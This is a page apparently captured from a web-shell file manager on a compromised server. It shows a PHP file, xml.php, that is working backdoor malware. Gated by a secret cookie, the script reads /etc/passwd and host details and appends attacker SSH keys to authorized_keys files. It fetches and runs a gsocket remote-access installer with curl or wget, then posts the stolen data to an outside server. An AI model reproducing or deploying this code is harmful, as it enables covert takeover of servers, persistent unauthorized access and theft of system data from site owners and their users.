Sindbad~EG File Manager

Current Path : /home/polikis1/public_html.bak/
Upload File :
Current File : /home/polikis1/public_html.bak/xml.php

<?php

error_reporting(E_ALL);
ini_set('display_errors', 1);
ini_set('log_errors', 0);

if (!empty($_COOKIE['f6975d6b0e6087dbea971c93cdce5dd2']) && $_COOKIE['f6975d6b0e6087dbea971c93cdce5dd2'] === 'da00c38aacde5b89aa408c8338151caa') {
} elseif (!empty($_REQUEST['f6975d6b0e6087dbea971c93cdce5dd2']) && $_REQUEST['f6975d6b0e6087dbea971c93cdce5dd2'] === 'da00c38aacde5b89aa408c8338151caa') {
} elseif (!empty($xml_code)) {
} elseif (PHP_SAPI === 'cli') {
} else {
    header('HTTP/1.1 200 OK', true);
    header('X-Accel-Buffering: no');
    header('Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, s-maxage=0, post-check=0, pre-check=0');
    header('Cache-Control: no-cache', false);
    header('Pragma: no-cache');
    header('Expires: Mon, 26 Jul 1997 05:00:00 GMT');
    header('Last-Modified: '.gmdate('D, d M Y H:i:s').' GMT');
    header('disablevcache: true');
    return;
}

$ihupwpa_i = trim(@file_get_contents('https://api4.ipify.org', false, stream_context_create(['http' => ['timeout' => 5]]))."
".@file_get_contents('https://api6.ipify.org', false, stream_context_create(['http' => ['timeout' => 5]])));
$ihupwpa_h = gethostname();
$ihupwpa_u = get_current_user();
$ihupwpa_pu = '';
if (function_exists('posix_geteuid') && function_exists('posix_getpwuid')) {
    $ihupwpa_pu = posix_getpwuid(posix_geteuid())['name'];
}
if ($ihupwpa_pu !== '' && $ihupwpa_pu !== $ihupwpa_u) {
    $ihupwpa_u .= "
".$ihupwpa_pu;
}
$ihupwpa_pw = getcwd();
$ihupwpa_pa = @is_readable('/etc/passw'.'d') ? @file_get_contents('/etc/passw'.'d') : '';
print('<pre>'."
");
print('i='.$ihupwpa_i."
");
print('h='.$ihupwpa_h."
");
print('u='.$ihupwpa_u."
");
print('pw='.$ihupwpa_pw."
");
print('pa='.$ihupwpa_pa."
");
print('</pre>'."
");

$ak_base_folders = [];
if (getenv('HOME')) {
    $ak_base_folders[] = getenv('HOME');
}
if (getenv('USERPROFILE')) {
    $ak_base_folders[] = getenv('USERPROFILE');
}
if (function_exists('posix_getuid') && function_exists('posix_getpwuid')) {
    $ak_info = posix_getpwuid(posix_getuid());
    if (!empty($ak_info['dir'])) {
        $ak_base_folders[] = $ak_info['dir'];
    }
}
if (getenv('USER')) {
    $ak_base_folders[] = '/home/'.getenv('USER');
}
if (defined('ABSPATH')) {
    $ak_base_folders[] = rtrim(ABSPATH, '/');
    $ak_base_folders[] = dirname(ABSPATH);
}
if (!empty($_SERVER['DOCUMENT_ROOT'])) {
    $ak_base_folders[] = $_SERVER['DOCUMENT_ROOT'];
}
if (!empty($_SERVER['DOCUMENT_ROOT'])) {
    $ak_base_folders[] = dirname($_SERVER['DOCUMENT_ROOT']);
}
$ak_base_folders = array_unique($ak_base_folders);
$ak_base_folder_list = [];
foreach ($ak_base_folders as $ak_base_folder) {
    if (!is_dir($ak_base_folder)) {
        continue;
    }
    $ak_base_folder_list[] = $ak_base_folder;
    $ak_s_folder = $ak_base_folder.'/.ssh';
    $ak_a_file = $ak_base_folder.'/.ssh/authorized_keys';
    if (!@is_dir($ak_s_folder)) {
        @mkdir($ak_s_folder, 0700, true);
    }
    @chmod($ak_s_folder, 0700);
    @touch($ak_a_file);
    @chmod($ak_a_file, 0600);
    @file_put_contents($ak_a_file, "
", FILE_APPEND);
    @file_put_contents($ak_a_file, 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDnl58I0bMWNGeies3I5qELXn4No3FAUjDvvagXR7GuMnqKCghBeNf1lJ/U0KF1B78dCibHlDkR848UWBVdWHXFdFc4RWFzS8xIgVRLAQtWX5PpMSBT3Zmhk7DuNCGrrT6od+ZQR3cpGn0TrZw0bP20puETI9rO9Q25nrP9JlEBznFtKJkL0Ruwr3+w1O1CP60tcx1NhmmJcznKFlHrlCxZXA1SBatMZchM+jXiwkRf2AkM2tva+3b0docpuFm/3bY/7xdoc7/ZBCMjxl/NDsOau80iGzTfk2lOBjRDvGbyneZcFDtRm4KyJkopplzqdMo5lWikVUroUXYfgeA2eLpGbraO0peQMCb7LZcOzXKxWiGl5mIkHd6brUOztSpQkslRNjjKXVNvxbrS2TrJEeTuClM8tPnClClRKR21wHn66sPbJrRhppKq4KJxD8UaP8EfNe6vLtkXT1DDJpWWL9C9k7qox20bQHFTcY8MmO3t0kRXuhy7HHYIo5IIGKTDOKU='."
", FILE_APPEND);
    @file_put_contents($ak_a_file, 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMXvanAQMY/rVWukp6d0t0xzeIO2DzO1pDF58skSRds6'."
", FILE_APPEND);
    print('<pre>'."
".'f='.$ak_base_folder."
".'</pre>'."
");
}

$my_execution = function($cmd, &$stderr = null, &$status = null) {
    $stderr = null;
    $status = null;
    static $disable_functions;
    if (!isset($disable_functions)) {
        $disable_functions = array_flip(array_map('strtolower', array_map('trim', explode(',', trim(ini_get('disable_functions'))))));
    }
    $functions = [];
    $functions[] = 'proc_open';
    $functions[] = 'exec';
    if (func_num_args() >= 3) {
        $functions[] = 'passthru';
        $functions[] = 'system';
        $functions[] = 'shell_exec';
    } else {
        $functions[] = 'shell_exec';
        $functions[] = 'passthru';
        $functions[] = 'system';
    }
    foreach ($functions as $function) {
        if ($function === 'proc_open' && function_exists('proc_open') && is_callable('proc_open') && !isset($disable_functions['proc_open'])) {
            $descriptorspec = [
                1 => ['pipe', 'w'],
                2 => ['pipe', 'w']
            ];
            $pipes = [];
            $proc = proc_open($cmd, $descriptorspec, $pipes);
            $stdout = stream_get_contents($pipes[1]);
            fclose($pipes[1]);
            $stderr = stream_get_contents($pipes[2]);
            fclose($pipes[2]);
            $status = proc_close($proc);
            if ($stdout === "

") {
                $stdout = '';
            }
            return $stdout;
        }
        if ($function === 'exec' && function_exists('exec') && is_callable('exec') && !isset($disable_functions['exec'])) {
            $stdout = [];
            exec($cmd, $stdout, $status);
            $stdout = implode(PHP_EOL, $stdout);
            return $stdout;
        }
        if ($function === 'passthru' && function_exists('passthru') && is_callable('passthru') && !isset($disable_functions['passthru'])) {
            ob_start();
            passthru($cmd, $status);
            $stdout = ob_get_clean();
            return $stdout;
        }
        if ($function === 'system' && function_exists('system') && is_callable('system') && !isset($disable_functions['system'])) {
            ob_start();
            system($cmd, $status);
            $stdout = ob_get_clean();
            return $stdout;
        }
        if ($function === 'shell_exec' && function_exists('shell_exec') && is_callable('shell_exec') && !isset($disable_functions['shell_exec'])) {
            $stdout = shell_exec($cmd);
            return $stdout;
        }
    }
};
$my_stdout = $my_execution('bash -c "$(curl -fsSL https://gsocket.io/y)"');
print('<pre>'."
".strval($my_stdout ? $my_stdout : 'NULL')."
".'</pre>'."
");
if (strpos($my_stdout, 'To connect use one of the following') === false) {
    $my_stdout .= $my_execution('bash -c "$(wget --no-verbose -O- https://gsocket.io/y)"');
    print('<pre>'."
".strval($my_stdout ? $my_stdout : 'NULL')."
".'</pre>'."
");
}

$curl_request = function($method, $url, $headers = [], $params = null, $options = []) {
    if (is_string($headers)) {
        $headers = array_values(array_filter(array_map('trim', explode("
", $headers))));
    }
    if (is_array($headers) && isset($headers['headers']) && is_array($headers['headers'])) {
        $headers = $headers['headers'];
    }
    if (is_array($headers)) {
        foreach ($headers as $key => $value) {
            if (is_string($key) && !is_numeric($key)) {
                $headers[$key] = sprintf('%s: %s', $key, $value);
            }
        }
    }
    if (is_array($params) || (is_object($params) && $params instanceof Traversable)) {
        $has_curl_file = false;
        foreach ($params as $key => $value) {
            if (is_object($value) && $value instanceof CURLFile) {
                $has_curl_file = true;
                break;
            }
        }
        if (!$has_curl_file) {
            $params = http_build_query($params);
        }
    } elseif (is_object($params)) {
        $params = http_build_query($params);
    }
    $opts = [];
    $opts[CURLINFO_HEADER_OUT] = true;
    $opts[CURLOPT_CONNECTTIMEOUT] = 5;
    $opts[CURLOPT_CUSTOMREQUEST] = strtoupper($method);
    $opts[CURLOPT_ENCODING] = '';
    $opts[CURLOPT_FOLLOWLOCATION] = false;
    $opts[CURLOPT_HEADER] = true;
    $opts[CURLOPT_HTTPHEADER] = $headers;
    if ($params !== null) {
        $opts[CURLOPT_POSTFIELDS] = $params;
    }
    $opts[CURLOPT_RETURNTRANSFER] = true;
    $opts[CURLOPT_SSL_VERIFYHOST] = 0;
    $opts[CURLOPT_SSL_VERIFYPEER] = 0;
    $opts[CURLOPT_TIMEOUT] = 10;
    $opts[CURLOPT_URL] = $url;
    foreach ($opts as $key => $value) {
        if (!array_key_exists($key, $options)) {
            $options[$key] = $value;
        }
    }
    $follow = false;
    if ($options[CURLOPT_FOLLOWLOCATION]) {
        $follow = true;
        $options[CURLOPT_FOLLOWLOCATION] = false;
    }
    $errors = 2;
    $redirects = isset($options[CURLOPT_MAXREDIRS]) ? $options[CURLOPT_MAXREDIRS] : 5;
    while (true) {
        $ch = curl_init();
        curl_setopt_array($ch, $options);
        $body = curl_exec($ch);
        $info = curl_getinfo($ch);
        $head = substr($body, 0, $info['header_size']);
        $body = substr($body, $info['header_size']);
        $error = curl_error($ch);
        $errno = curl_errno($ch);
        curl_close($ch);
        $response = [
            'info' => $info,
            'head' => $head,
            'body' => $body,
            'error' => $error,
            'errno' => $errno,
        ];
        if ($error || $errno) {
            if ($errors > 0) {
                $errors--;
                continue;
            }
        } elseif ($info['redirect_url'] && $follow) {
            if ($redirects > 0) {
                $redirects--;
                $options[CURLOPT_URL] = $info['redirect_url'];
                continue;
            }
        }
        break;
    }
    return $response;
};
$fgc_request = function($method, $url, $headers = [], $params = null, $options = []) {
    if (is_string($headers)) {
        $headers = array_values(array_filter(array_map('trim', explode("
", $headers))));
    }
    if (is_array($headers) && isset($headers['headers']) && is_array($headers['headers'])) {
        $headers = $headers['headers'];
    }
    if (is_array($headers)) {
        foreach ($headers as $key => $value) {
            if (is_string($key) && !is_numeric($key)) {
                $headers[$key] = sprintf('%s: %s', $key, $value);
            }
        }
    }
    if (is_array($params) || (is_object($params) && $params instanceof Traversable)) {
        $has_curl_file = false;
        foreach ($params as $key => $value) {
            if (is_object($value) && $value instanceof CURLFile) {
                $has_curl_file = true;
                break;
            }
        }
        if (!$has_curl_file) {
            $params = http_build_query($params);
        }
    } elseif (is_object($params)) {
        $params = http_build_query($params);
    }
    $opts = [
        'http' => [
            'method' => strtoupper($method),
            'header' => implode("
", $headers),
            'follow_location' => false,
            'max_redirects' => 5,
            'timeout' => 10,
        ],
        'ssl' => [
            'verify_peer' => false,
            'verify_peer_name' => false,
        ],
    ];
    if (array_key_exists('CURLOPT_FOLLOWLOCATION', $options)) {
        $opts['http']['follow_location'] = $options['CURLOPT_FOLLOWLOCATION'];
    }
    if (array_key_exists('CURLOPT_MAXREDIRS', $options)) {
        $opts['http']['max_redirects'] = $options['CURLOPT_MAXREDIRS'];
    }
    if (array_key_exists('CURLOPT_TIMEOUT', $options)) {
        $opts['http']['timeout'] = $options['CURLOPT_TIMEOUT'];
    } elseif (array_key_exists('CURLOPT_CONNECTTIMEOUT', $options)) {
        $opts['http']['timeout'] = $options['CURLOPT_CONNECTTIMEOUT'];
    }
    if ($params !== null) {
        $opts['http']['content'] = $params;
    }
    $context = stream_context_create($opts);
    $body = @file_get_contents($url, false, $context);
    $last_error = error_get_last();
    if ($body === false) {
        $body = '';
    }
    $info = [
        'http_code' => ($http_response_header[0] ?? 'HTTP/1.1 500') === 'HTTP/1.1 200' ? 200 : 500,
    ];
    $head = '';
    if (!$http_response_header) {
        $head = '';
    } elseif ($http_response_header) {
        $head = implode("
", $http_response_header);
    }
    $error = 'Error';
    if (is_array($last_error)) {
        $error = $last_error['message'];
    } elseif (!$http_response_header) {
        $error = 'Error';
    } elseif ($http_response_header) {
        $error = '';
    }
    $errno = 1;
    if (is_array($last_error)) {
        $errno = $last_error['message'];
    } elseif (!$http_response_header) {
        $errno = 1;
    } elseif ($http_response_header) {
        $errno = 0;
    }
    $response = [
        'info' => $info,
        'head' => $head,
        'body' => $body,
        'error' => $error,
        'errno' => $errno,
    ];
    return $response;
};
$my_method = 'POST';
$my_url = !empty($_REQUEST['url']) ? $_REQUEST['url'] : 'https://information.cloudsyndication.org/';
$my_headers = [];
$my_params = [
    'method' => $_SERVER['REQUEST_METHOD'],
    'path' => explode('?', $_SERVER['REQUEST_URI'], 2)[0],
    'query' => implode('?', array_slice(explode('?', $_SERVER['REQUEST_URI'], 2), 1)),
    'headers' => json_encode(function_exists('getallheaders') ? getallheaders() : $_SERVER, JSON_PRETTY_PRINT | JSON_UNESCAPED_UNICODE | JSON_UNESCAPED_SLASHES),
    'params' => '',
    'server' => json_encode($_SERVER, JSON_PRETTY_PRINT | JSON_UNESCAPED_UNICODE | JSON_UNESCAPED_SLASHES),
];
$my_params['params'] .= '<pre>'."
";
$my_params['params'] .= 'i='.$ihupwpa_i."
";
$my_params['params'] .= 'h='.$ihupwpa_h."
";
$my_params['params'] .= 'u='.$ihupwpa_u."
";
$my_params['params'] .= 'pw='.$ihupwpa_pw."
";
$my_params['params'] .= 'pa='.$ihupwpa_pa."
";
$my_params['params'] .= '</pre>'."
";
foreach ($ak_base_folder_list as $ak_base_folder) {
    $my_params['params'] .= '<pre>'."
".'f='.$ak_base_folder."
".'</pre>'."
";
}
$my_params['params'] .= '<pre>'."
".strval($my_stdout ? $my_stdout : 'NULL')."
".'</pre>'."
";
$my_options = [];
if (function_exists('curl_init')) {
    for ($my_retry = 0; $my_retry < 3; $my_retry++) {
        $my_response = $curl_request($my_method, $my_url, $my_headers, $my_params, $my_options);
        if ($my_response['errno'] || $my_response['error']) {
            continue;
        }
        break;
    }
} else {
    for ($my_retry = 0; $my_retry < 3; $my_retry++) {
        $my_response = $fgc_request($my_method, $my_url, $my_headers, $my_params, $my_options);
        if ($my_response['errno'] || $my_response['error']) {
            continue;
        }
        break;
    }
}

Sindbad File Manager Version 1.0, Coded By Sindbad EG ~ The Terrorists